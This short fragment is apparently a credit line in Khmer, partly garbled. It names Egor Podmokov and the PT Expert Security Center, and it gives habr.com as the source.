- Egor Podmokov α’αααααααΆα PT Expert Security Center αα αα αααα·ααααΆαα·αααααΆα
ααααα: www.habr.com